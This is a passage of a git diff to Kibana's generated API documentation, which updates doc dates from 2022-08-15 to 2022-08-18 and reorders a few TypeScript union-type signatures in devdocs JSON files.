@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-theme-browser title: "@kbn/core-theme-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-theme-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-theme-browser'] --- import kbnCoreThemeBrowserObj from './kbn_core_theme_browser.devdocs.json'; diff --git a/api_docs/kbn_core_theme_browser_internal.mdx b/api_docs/kbn_core_theme_browser_internal.mdx index 2d02aae90e284..93b61d9860ce2 100644 --- a/api_docs/kbn_core_theme_browser_internal.mdx +++ b/api_docs/kbn_core_theme_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-theme-browser-internal title: "@kbn/core-theme-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-theme-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-theme-browser-internal'] --- import kbnCoreThemeBrowserInternalObj from './kbn_core_theme_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_theme_browser_mocks.mdx b/api_docs/kbn_core_theme_browser_mocks.mdx index d3b9b23443bd1..3892c424f0402 100644 --- a/api_docs/kbn_core_theme_browser_mocks.mdx +++ b/api_docs/kbn_core_theme_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-theme-browser-mocks title: "@kbn/core-theme-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-theme-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-theme-browser-mocks'] --- import kbnCoreThemeBrowserMocksObj from './kbn_core_theme_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_ui_settings_browser.mdx b/api_docs/kbn_core_ui_settings_browser.mdx index 65b0c99f6012b..64ed23a22fbc8 100644 --- a/api_docs/kbn_core_ui_settings_browser.mdx 
+++ b/api_docs/kbn_core_ui_settings_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-ui-settings-browser title: "@kbn/core-ui-settings-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-ui-settings-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-ui-settings-browser'] --- import kbnCoreUiSettingsBrowserObj from './kbn_core_ui_settings_browser.devdocs.json'; diff --git a/api_docs/kbn_core_ui_settings_browser_internal.mdx b/api_docs/kbn_core_ui_settings_browser_internal.mdx index 9235473a6948f..8b84bcd28230a 100644 --- a/api_docs/kbn_core_ui_settings_browser_internal.mdx +++ b/api_docs/kbn_core_ui_settings_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-ui-settings-browser-internal title: "@kbn/core-ui-settings-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-ui-settings-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-ui-settings-browser-internal'] --- import kbnCoreUiSettingsBrowserInternalObj from './kbn_core_ui_settings_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_ui_settings_browser_mocks.mdx b/api_docs/kbn_core_ui_settings_browser_mocks.mdx index c109ec63a2c17..a7dc51baa7a43 100644 --- a/api_docs/kbn_core_ui_settings_browser_mocks.mdx +++ b/api_docs/kbn_core_ui_settings_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-ui-settings-browser-mocks title: "@kbn/core-ui-settings-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-ui-settings-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-ui-settings-browser-mocks'] --- import kbnCoreUiSettingsBrowserMocksObj from './kbn_core_ui_settings_browser_mocks.devdocs.json'; 
diff --git a/api_docs/kbn_core_ui_settings_common.devdocs.json b/api_docs/kbn_core_ui_settings_common.devdocs.json index 439a926b8f4e0..f74eb88611721 100644 --- a/api_docs/kbn_core_ui_settings_common.devdocs.json +++ b/api_docs/kbn_core_ui_settings_common.devdocs.json @@ -151,7 +151,7 @@ "array of permitted values for this setting" ], "signature": [ - "number[] | string[] | undefined" + "string[] | number[] | undefined" ], "path": "packages/core/ui-settings/core-ui-settings-common/src/ui_settings.ts", "deprecated": false @@ -374,7 +374,7 @@ "\nA sub-set of {@link UiSettingsParams} exposed to the client-side." ], "signature": [ - "{ metric?: { type: string; name: string; } | undefined; type?: ", + "{ options?: string[] | number[] | undefined; type?: ", { "pluginId": "@kbn/core-ui-settings-common", "scope": "common", @@ -382,7 +382,7 @@ "section": "def-common.UiSettingsType", "text": "UiSettingsType" }, - " | undefined; name?: string | undefined; order?: number | undefined; value?: unknown; description?: string | undefined; options?: number[] | string[] | undefined; category?: string[] | undefined; optionLabels?: Record | undefined; requiresPageReload?: boolean | undefined; readonly?: boolean | undefined; sensitive?: boolean | undefined; deprecation?: ", + " | undefined; metric?: { type: string; name: string; } | undefined; value?: unknown; description?: string | undefined; name?: string | undefined; order?: number | undefined; category?: string[] | undefined; optionLabels?: Record | undefined; requiresPageReload?: boolean | undefined; readonly?: boolean | undefined; sensitive?: boolean | undefined; deprecation?: ", { "pluginId": "@kbn/core-ui-settings-common", "scope": "common", diff --git a/api_docs/kbn_core_ui_settings_common.mdx b/api_docs/kbn_core_ui_settings_common.mdx index 8c52b4acc359d..27e5f1fb1e5e3 100644 --- a/api_docs/kbn_core_ui_settings_common.mdx +++ b/api_docs/kbn_core_ui_settings_common.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-ui-settings-common title: "@kbn/core-ui-settings-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-ui-settings-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-ui-settings-common'] --- import kbnCoreUiSettingsCommonObj from './kbn_core_ui_settings_common.devdocs.json'; diff --git a/api_docs/kbn_crypto.mdx b/api_docs/kbn_crypto.mdx index 80c0b181d61fd..3a7f76deb43ab 100644 --- a/api_docs/kbn_crypto.mdx +++ b/api_docs/kbn_crypto.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-crypto title: "@kbn/crypto" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/crypto plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/crypto'] --- import kbnCryptoObj from './kbn_crypto.devdocs.json'; diff --git a/api_docs/kbn_crypto_browser.mdx b/api_docs/kbn_crypto_browser.mdx index 25cb4e2152dc1..64984b67c9293 100644 --- a/api_docs/kbn_crypto_browser.mdx +++ b/api_docs/kbn_crypto_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-crypto-browser title: "@kbn/crypto-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/crypto-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/crypto-browser'] --- import kbnCryptoBrowserObj from './kbn_crypto_browser.devdocs.json'; diff --git a/api_docs/kbn_datemath.devdocs.json b/api_docs/kbn_datemath.devdocs.json index fc0a5027ecb5b..d3d0d4282c053 100644 --- a/api_docs/kbn_datemath.devdocs.json +++ b/api_docs/kbn_datemath.devdocs.json @@ -105,7 +105,7 @@ "label": "Unit", "description": [], "signature": [ - "\"d\" | \"y\" | \"s\" | \"m\" | \"M\" | \"w\" | \"h\" | \"ms\"" + "\"y\" | \"M\" | \"w\" | \"d\" | \"h\" | \"m\" | \"s\" | \"ms\"" ], "path": "packages/kbn-datemath/src/index.ts", "deprecated": false, 
@@ -182,7 +182,7 @@ "label": "UnitsMap", "description": [], "signature": [ - "{ d: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; y: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; s: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; m: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; M: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; w: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; h: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; ms: { weight: number; type: \"fixed\" | \"mixed\" | \"calendar\"; base: number; }; }" + "{ y: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; M: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; w: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; d: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; h: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; m: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; s: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; ms: { weight: number; type: \"fixed\" | \"calendar\" | \"mixed\"; base: number; }; }" ], "path": "packages/kbn-datemath/src/index.ts", "deprecated": false, diff --git a/api_docs/kbn_datemath.mdx b/api_docs/kbn_datemath.mdx index a6c12ab580409..d440fa059f629 100644 --- a/api_docs/kbn_datemath.mdx +++ b/api_docs/kbn_datemath.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-datemath title: "@kbn/datemath" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/datemath plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/datemath'] --- import kbnDatemathObj from './kbn_datemath.devdocs.json'; 
diff --git a/api_docs/kbn_dev_cli_errors.mdx b/api_docs/kbn_dev_cli_errors.mdx index 896528891e8a1..61e2d2a39ca14 100644 --- a/api_docs/kbn_dev_cli_errors.mdx +++ b/api_docs/kbn_dev_cli_errors.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-dev-cli-errors title: "@kbn/dev-cli-errors" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/dev-cli-errors plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/dev-cli-errors'] --- import kbnDevCliErrorsObj from './kbn_dev_cli_errors.devdocs.json'; diff --git a/api_docs/kbn_dev_cli_runner.devdocs.json b/api_docs/kbn_dev_cli_runner.devdocs.json index f3523e04e5a20..cb449481aaf1b 100644 --- a/api_docs/kbn_dev_cli_runner.devdocs.json +++ b/api_docs/kbn_dev_cli_runner.devdocs.json @@ -885,7 +885,7 @@ "label": "log", "description": [], "signature": [ - "{ defaultLevel?: \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined; } | undefined" + "{ defaultLevel?: \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined; } | undefined" ], "path": "packages/kbn-dev-cli-runner/src/run.ts", "deprecated": false @@ -941,7 +941,7 @@ "label": "log", "description": [], "signature": [ - "{ defaultLevel?: \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined; } | undefined" + "{ defaultLevel?: \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined; } | undefined" ], "path": "packages/kbn-dev-cli-runner/src/run_with_commands.ts", "deprecated": false diff --git a/api_docs/kbn_dev_cli_runner.mdx b/api_docs/kbn_dev_cli_runner.mdx index 5df1cd8a51612..83964a3198a1b 100644 --- a/api_docs/kbn_dev_cli_runner.mdx +++ b/api_docs/kbn_dev_cli_runner.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-dev-cli-runner title: "@kbn/dev-cli-runner" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/dev-cli-runner plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/dev-cli-runner'] --- import kbnDevCliRunnerObj from './kbn_dev_cli_runner.devdocs.json'; diff --git a/api_docs/kbn_dev_proc_runner.mdx b/api_docs/kbn_dev_proc_runner.mdx index 2003db4ad3276..d7e0b852a94e7 100644 --- a/api_docs/kbn_dev_proc_runner.mdx +++ b/api_docs/kbn_dev_proc_runner.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-dev-proc-runner title: "@kbn/dev-proc-runner" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/dev-proc-runner plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/dev-proc-runner'] --- import kbnDevProcRunnerObj from './kbn_dev_proc_runner.devdocs.json'; diff --git a/api_docs/kbn_dev_utils.mdx b/api_docs/kbn_dev_utils.mdx index 699666ff37139..4f7a4a332b0d9 100644 --- a/api_docs/kbn_dev_utils.mdx +++ b/api_docs/kbn_dev_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-dev-utils title: "@kbn/dev-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/dev-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/dev-utils'] --- import kbnDevUtilsObj from './kbn_dev_utils.devdocs.json'; diff --git a/api_docs/kbn_doc_links.mdx b/api_docs/kbn_doc_links.mdx index e774fabd77582..cdb41ca37fa3f 100644 --- a/api_docs/kbn_doc_links.mdx +++ b/api_docs/kbn_doc_links.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-doc-links title: "@kbn/doc-links" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/doc-links plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/doc-links'] --- import kbnDocLinksObj from './kbn_doc_links.devdocs.json'; diff --git a/api_docs/kbn_docs_utils.mdx b/api_docs/kbn_docs_utils.mdx index 152b82990a57c..f40ce355eaf4b 100644 --- a/api_docs/kbn_docs_utils.mdx +++ b/api_docs/kbn_docs_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-docs-utils title: "@kbn/docs-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/docs-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/docs-utils'] --- import kbnDocsUtilsObj from './kbn_docs_utils.devdocs.json'; diff --git a/api_docs/kbn_ebt_tools.mdx b/api_docs/kbn_ebt_tools.mdx index 6385eca388c06..3171efaf3386e 100644 --- a/api_docs/kbn_ebt_tools.mdx +++ b/api_docs/kbn_ebt_tools.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ebt-tools title: "@kbn/ebt-tools" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ebt-tools plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ebt-tools'] --- import kbnEbtToolsObj from './kbn_ebt_tools.devdocs.json'; diff --git a/api_docs/kbn_es_archiver.mdx b/api_docs/kbn_es_archiver.mdx index c0b8b95afd076..b5d4f9edc5655 100644 --- a/api_docs/kbn_es_archiver.mdx +++ b/api_docs/kbn_es_archiver.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-es-archiver title: "@kbn/es-archiver" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/es-archiver plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/es-archiver'] --- import kbnEsArchiverObj from './kbn_es_archiver.devdocs.json'; 
diff --git a/api_docs/kbn_es_errors.mdx b/api_docs/kbn_es_errors.mdx index d6dffdc4522a5..e6b40c8df7943 100644 --- a/api_docs/kbn_es_errors.mdx +++ b/api_docs/kbn_es_errors.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-es-errors title: "@kbn/es-errors" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/es-errors plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/es-errors'] --- import kbnEsErrorsObj from './kbn_es_errors.devdocs.json'; diff --git a/api_docs/kbn_es_query.devdocs.json b/api_docs/kbn_es_query.devdocs.json index d7a24b8740064..f238caaf35698 100644 --- a/api_docs/kbn_es_query.devdocs.json +++ b/api_docs/kbn_es_query.devdocs.json @@ -3690,7 +3690,7 @@ "label": "function", "description": [], "signature": [ - "\"nested\" | \"exists\" | \"range\" | \"is\" | \"and\" | \"or\" | \"not\"" + "\"range\" | \"nested\" | \"exists\" | \"is\" | \"and\" | \"or\" | \"not\"" ], "path": "packages/kbn-es-query/src/kuery/node_types/types.ts", "deprecated": false diff --git a/api_docs/kbn_es_query.mdx b/api_docs/kbn_es_query.mdx index bada979dd795a..2dd45f6fddb1c 100644 --- a/api_docs/kbn_es_query.mdx +++ b/api_docs/kbn_es_query.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-es-query title: "@kbn/es-query" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/es-query plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/es-query'] --- import kbnEsQueryObj from './kbn_es_query.devdocs.json'; diff --git a/api_docs/kbn_eslint_plugin_imports.mdx b/api_docs/kbn_eslint_plugin_imports.mdx index 59633ea783a60..aa4ca7533f06f 100644 --- a/api_docs/kbn_eslint_plugin_imports.mdx +++ b/api_docs/kbn_eslint_plugin_imports.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-eslint-plugin-imports title: "@kbn/eslint-plugin-imports" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/eslint-plugin-imports plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/eslint-plugin-imports'] --- import kbnEslintPluginImportsObj from './kbn_eslint_plugin_imports.devdocs.json'; diff --git a/api_docs/kbn_field_types.mdx b/api_docs/kbn_field_types.mdx index f697d734f9307..57ca434933edd 100644 --- a/api_docs/kbn_field_types.mdx +++ b/api_docs/kbn_field_types.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-field-types title: "@kbn/field-types" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/field-types plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/field-types'] --- import kbnFieldTypesObj from './kbn_field_types.devdocs.json'; diff --git a/api_docs/kbn_find_used_node_modules.mdx b/api_docs/kbn_find_used_node_modules.mdx index a52f7e08c18ac..5ea870d5ea6b9 100644 --- a/api_docs/kbn_find_used_node_modules.mdx +++ b/api_docs/kbn_find_used_node_modules.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-find-used-node-modules title: "@kbn/find-used-node-modules" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/find-used-node-modules plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/find-used-node-modules'] --- import kbnFindUsedNodeModulesObj from './kbn_find_used_node_modules.devdocs.json'; diff --git a/api_docs/kbn_generate.mdx b/api_docs/kbn_generate.mdx index 2628105136a99..a7011b1b2bd0e 100644 --- a/api_docs/kbn_generate.mdx +++ b/api_docs/kbn_generate.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-generate title: "@kbn/generate" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/generate plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/generate'] --- import kbnGenerateObj from './kbn_generate.devdocs.json'; diff --git a/api_docs/kbn_get_repo_files.mdx b/api_docs/kbn_get_repo_files.mdx index 82a5586e751f7..51b8b7608822d 100644 --- a/api_docs/kbn_get_repo_files.mdx +++ b/api_docs/kbn_get_repo_files.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-get-repo-files title: "@kbn/get-repo-files" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/get-repo-files plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/get-repo-files'] --- import kbnGetRepoFilesObj from './kbn_get_repo_files.devdocs.json'; diff --git a/api_docs/kbn_handlebars.mdx b/api_docs/kbn_handlebars.mdx index a69deb4635b6a..e559a355ec49e 100644 --- a/api_docs/kbn_handlebars.mdx +++ b/api_docs/kbn_handlebars.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-handlebars title: "@kbn/handlebars" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/handlebars plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/handlebars'] --- import kbnHandlebarsObj from './kbn_handlebars.devdocs.json'; diff --git a/api_docs/kbn_hapi_mocks.mdx b/api_docs/kbn_hapi_mocks.mdx index c383b8ddebba0..d88b2684492ec 100644 --- a/api_docs/kbn_hapi_mocks.mdx +++ b/api_docs/kbn_hapi_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-hapi-mocks title: "@kbn/hapi-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/hapi-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/hapi-mocks'] --- import kbnHapiMocksObj from './kbn_hapi_mocks.devdocs.json'; 
diff --git a/api_docs/kbn_home_sample_data_card.devdocs.json b/api_docs/kbn_home_sample_data_card.devdocs.json index 4297b7ded9eb5..1806b7c0a813f 100644 --- a/api_docs/kbn_home_sample_data_card.devdocs.json +++ b/api_docs/kbn_home_sample_data_card.devdocs.json @@ -602,7 +602,7 @@ "\nParameters drawn from the Storybook arguments collection that customize a component story." ], "signature": [ - "{ status: any; name: any; description: any; includeAppLinks: any; simulateErrors: any; }" + "{ status: any; description: any; name: any; includeAppLinks: any; simulateErrors: any; }" ], "path": "packages/home/sample_data_card/src/mocks/index.ts", "deprecated": false, diff --git a/api_docs/kbn_home_sample_data_card.mdx b/api_docs/kbn_home_sample_data_card.mdx index d515fa8af7c93..d335f7dca6d4e 100644 --- a/api_docs/kbn_home_sample_data_card.mdx +++ b/api_docs/kbn_home_sample_data_card.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-home-sample-data-card title: "@kbn/home-sample-data-card" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/home-sample-data-card plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/home-sample-data-card'] --- import kbnHomeSampleDataCardObj from './kbn_home_sample_data_card.devdocs.json'; diff --git a/api_docs/kbn_home_sample_data_tab.mdx b/api_docs/kbn_home_sample_data_tab.mdx index f07c442fcea92..30e0c682aff67 100644 --- a/api_docs/kbn_home_sample_data_tab.mdx +++ b/api_docs/kbn_home_sample_data_tab.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-home-sample-data-tab title: "@kbn/home-sample-data-tab" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/home-sample-data-tab plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/home-sample-data-tab'] --- import kbnHomeSampleDataTabObj from './kbn_home_sample_data_tab.devdocs.json'; 
diff --git a/api_docs/kbn_i18n.mdx b/api_docs/kbn_i18n.mdx index ca37a9efbfabd..fffaec03f91ef 100644 --- a/api_docs/kbn_i18n.mdx +++ b/api_docs/kbn_i18n.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-i18n title: "@kbn/i18n" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/i18n plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/i18n'] --- import kbnI18nObj from './kbn_i18n.devdocs.json'; diff --git a/api_docs/kbn_import_resolver.mdx b/api_docs/kbn_import_resolver.mdx index f89c33e4c6576..6d5c522639253 100644 --- a/api_docs/kbn_import_resolver.mdx +++ b/api_docs/kbn_import_resolver.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-import-resolver title: "@kbn/import-resolver" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/import-resolver plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/import-resolver'] --- import kbnImportResolverObj from './kbn_import_resolver.devdocs.json'; diff --git a/api_docs/kbn_interpreter.mdx b/api_docs/kbn_interpreter.mdx index 527cc0829964e..cc744bff457b9 100644 --- a/api_docs/kbn_interpreter.mdx +++ b/api_docs/kbn_interpreter.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-interpreter title: "@kbn/interpreter" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/interpreter plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/interpreter'] --- import kbnInterpreterObj from './kbn_interpreter.devdocs.json'; diff --git a/api_docs/kbn_io_ts_utils.mdx b/api_docs/kbn_io_ts_utils.mdx index 677d30c9bede2..ed7b7b135bb30 100644 --- a/api_docs/kbn_io_ts_utils.mdx +++ b/api_docs/kbn_io_ts_utils.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-io-ts-utils title: "@kbn/io-ts-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/io-ts-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/io-ts-utils'] --- import kbnIoTsUtilsObj from './kbn_io_ts_utils.devdocs.json'; diff --git a/api_docs/kbn_jest_serializers.mdx b/api_docs/kbn_jest_serializers.mdx index 9d7dbe4bfd469..587f242ef3ff8 100644 --- a/api_docs/kbn_jest_serializers.mdx +++ b/api_docs/kbn_jest_serializers.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-jest-serializers title: "@kbn/jest-serializers" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/jest-serializers plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/jest-serializers'] --- import kbnJestSerializersObj from './kbn_jest_serializers.devdocs.json'; diff --git a/api_docs/kbn_kibana_manifest_parser.mdx b/api_docs/kbn_kibana_manifest_parser.mdx index 7f32ca6fb45e0..df3611890de4c 100644 --- a/api_docs/kbn_kibana_manifest_parser.mdx +++ b/api_docs/kbn_kibana_manifest_parser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-kibana-manifest-parser title: "@kbn/kibana-manifest-parser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/kibana-manifest-parser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/kibana-manifest-parser'] --- import kbnKibanaManifestParserObj from './kbn_kibana_manifest_parser.devdocs.json'; diff --git a/api_docs/kbn_kibana_manifest_schema.mdx b/api_docs/kbn_kibana_manifest_schema.mdx index 656ac70c54de7..886b3d014e938 100644 --- a/api_docs/kbn_kibana_manifest_schema.mdx +++ b/api_docs/kbn_kibana_manifest_schema.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-kibana-manifest-schema title: "@kbn/kibana-manifest-schema" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/kibana-manifest-schema plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/kibana-manifest-schema'] --- import kbnKibanaManifestSchemaObj from './kbn_kibana_manifest_schema.devdocs.json'; diff --git a/api_docs/kbn_logging.devdocs.json b/api_docs/kbn_logging.devdocs.json index 48fbab71d99a6..33bcbcb329f08 100644 --- a/api_docs/kbn_logging.devdocs.json +++ b/api_docs/kbn_logging.devdocs.json @@ -618,7 +618,7 @@ "label": "EcsEventCategory", "description": [], "signature": [ - "\"database\" | \"email\" | \"package\" | \"network\" | \"web\" | \"file\" | \"host\" | \"session\" | \"registry\" | \"process\" | \"authentication\" | \"configuration\" | \"driver\" | \"iam\" | \"intrusion_detection\" | \"malware\"" + "\"host\" | \"database\" | \"email\" | \"package\" | \"network\" | \"web\" | \"file\" | \"session\" | \"registry\" | \"process\" | \"authentication\" | \"configuration\" | \"driver\" | \"iam\" | \"intrusion_detection\" | \"malware\"" ], "path": "packages/kbn-logging/src/ecs/event.ts", "deprecated": false, @@ -660,7 +660,7 @@ "label": "EcsEventType", "description": [], "signature": [ - "\"start\" | \"error\" | \"end\" | \"group\" | \"user\" | \"info\" | \"admin\" | \"protocol\" | \"connection\" | \"access\" | \"allowed\" | \"change\" | \"creation\" | \"deletion\" | \"denied\" | \"installation\"" + "\"start\" | \"error\" | \"connection\" | \"user\" | \"info\" | \"group\" | \"end\" | \"admin\" | \"protocol\" | \"access\" | \"allowed\" | \"change\" | \"creation\" | 